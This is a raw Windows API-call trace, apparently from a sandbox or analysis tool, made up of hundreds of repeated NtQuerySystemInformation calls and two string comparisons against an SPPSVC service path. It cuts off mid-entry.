[0228.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdb10, Length=0x20, ResultLength=0x0) [0228.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fddd0, Length=0x38, ResultLength=0x0) [0228.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fddd0, Length=0x38, ResultLength=0x0) [0228.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdc50, Length=0x20, ResultLength=0x0) [0228.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdbe0, Length=0x20, ResultLength=0x0) [0228.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdbe0, Length=0x20, ResultLength=0x0) [0228.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe200, Length=0x50, ResultLength=0x0) [0228.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe200, Length=0x50, ResultLength=0x0) [0228.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe200, Length=0x50, ResultLength=0x0) [0228.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe0f0, Length=0x50, ResultLength=0x0) [0228.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe0f0, Length=0x50, ResultLength=0x0) [0228.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe0f0, Length=0x50, ResultLength=0x0) [0228.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe0f0, Length=0x50, ResultLength=0x0) [0228.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe020, Length=0x38, ResultLength=0x0) [0228.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fde50, Length=0x28, ResultLength=0x0) [0228.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fde50, Length=0x28, ResultLength=0x0) [0228.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fde50, Length=0x28, ResultLength=0x0) [0228.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdec0, Length=0x28, ResultLength=0x0) [0228.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.573] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.573] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe020, Length=0x38, ResultLength=0x0) [0228.573] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.573] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdf40, Length=0x28, ResultLength=0x0) [0228.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdf40, Length=0x28, ResultLength=0x0) [0228.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe020, Length=0x38, ResultLength=0x0) [0228.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdea0, Length=0x20, ResultLength=0x0) [0228.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fde20, Length=0x20, ResultLength=0x0) [0228.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fde20, Length=0x20, ResultLength=0x0) [0228.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fde20, Length=0x20, ResultLength=0x0) [0228.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe020, Length=0x38, ResultLength=0x0) [0228.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdea0, Length=0x20, ResultLength=0x0) [0228.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fde30, Length=0x20, ResultLength=0x0) [0228.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.577] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.577] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.577] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fde30, Length=0x20, ResultLength=0x0) [0228.577] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.577] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.577] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.577] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.577] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.577] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.577] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.577] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe200, Length=0x50, ResultLength=0x0) [0228.577] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe200, Length=0x50, ResultLength=0x0) [0228.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe200, Length=0x50, ResultLength=0x0) [0228.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe0f0, Length=0x50, ResultLength=0x0) [0228.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe0f0, Length=0x50, ResultLength=0x0) [0228.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe0f0, Length=0x50, ResultLength=0x0) [0228.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe0f0, Length=0x50, ResultLength=0x0) [0228.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe020, Length=0x38, ResultLength=0x0) [0228.581] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.581] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fde50, Length=0x28, ResultLength=0x0) [0228.582] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.582] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.582] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fde50, Length=0x28, ResultLength=0x0) [0228.582] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.582] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.582] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fde50, Length=0x28, ResultLength=0x0) [0228.582] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.582] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.582] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdec0, Length=0x28, ResultLength=0x0) [0228.582] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.582] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.582] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe020, Length=0x38, ResultLength=0x0) [0228.583] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.583] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdf40, Length=0x28, ResultLength=0x0) [0228.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdf40, Length=0x28, ResultLength=0x0) [0228.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe020, Length=0x38, ResultLength=0x0) [0228.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdea0, Length=0x20, ResultLength=0x0) [0228.586] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fde20, Length=0x20, ResultLength=0x0) [0228.586] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.586] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fde20, Length=0x20, ResultLength=0x0) [0228.586] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.586] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fde20, Length=0x20, ResultLength=0x0) [0228.586] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.586] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.586] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.586] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.586] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe020, Length=0x38, ResultLength=0x0) [0228.586] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdea0, Length=0x20, ResultLength=0x0) [0228.586] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fde30, Length=0x20, ResultLength=0x0) [0228.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fde30, Length=0x20, ResultLength=0x0) [0228.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe2b0, Length=0x50, ResultLength=0x0) [0228.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe230, Length=0x28, ResultLength=0x0) [0228.588] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0228.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe2b0, Length=0x50, ResultLength=0x0) [0228.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe2b0, Length=0x50, ResultLength=0x0) [0228.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe2b0, Length=0x50, ResultLength=0x0) [0228.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe1e0, Length=0x38, ResultLength=0x0) [0228.591] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.592] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe010, Length=0x28, ResultLength=0x0) [0228.592] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.592] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.592] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe010, Length=0x28, ResultLength=0x0) [0228.592] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.592] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.592] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe010, Length=0x28, ResultLength=0x0) [0228.592] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.592] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.592] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe080, Length=0x28, ResultLength=0x0) [0228.592] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.592] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.592] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe1e0, Length=0x38, ResultLength=0x0) [0228.593] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.593] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe100, Length=0x28, ResultLength=0x0) [0228.594] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.595] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.595] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.595] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.595] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.595] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.595] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe100, Length=0x28, ResultLength=0x0) [0228.595] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.595] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.595] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe1e0, Length=0x38, ResultLength=0x0) [0228.595] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe060, Length=0x20, ResultLength=0x0) [0228.596] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdfe0, Length=0x20, ResultLength=0x0) [0228.596] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.596] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdfe0, Length=0x20, ResultLength=0x0) [0228.596] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.596] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdfe0, Length=0x20, ResultLength=0x0) [0228.596] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.596] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.596] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.596] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.596] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe1e0, Length=0x38, ResultLength=0x0) [0228.596] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe060, Length=0x20, ResultLength=0x0) [0228.596] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdff0, Length=0x20, ResultLength=0x0) [0228.596] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fdff0, Length=0x20, ResultLength=0x0) [0228.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe2b0, Length=0x50, ResultLength=0x0) [0228.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe230, Length=0x28, ResultLength=0x0) [0228.597] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0228.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe2b0, Length=0x50, ResultLength=0x0) [0228.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe2b0, Length=0x50, ResultLength=0x0) [0228.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe2b0, Length=0x50, ResultLength=0x0) [0228.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe1e0, Length=0x38, ResultLength=0x0) [0228.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe010, Length=0x28, ResultLength=0x0) [0228.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe010, Length=0x28, ResultLength=0x0) [0228.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe010, Length=0x28, ResultLength=0x0) [0228.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe080, Length=0x28, ResultLength=0x0) [0228.603] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.603] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.603] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe1e0, Length=0x38, ResultLength=0x0) [0228.603] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.603] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe100, Length=0x28, ResultLength=0x0) [0228.606] NtQuerySystemInformation 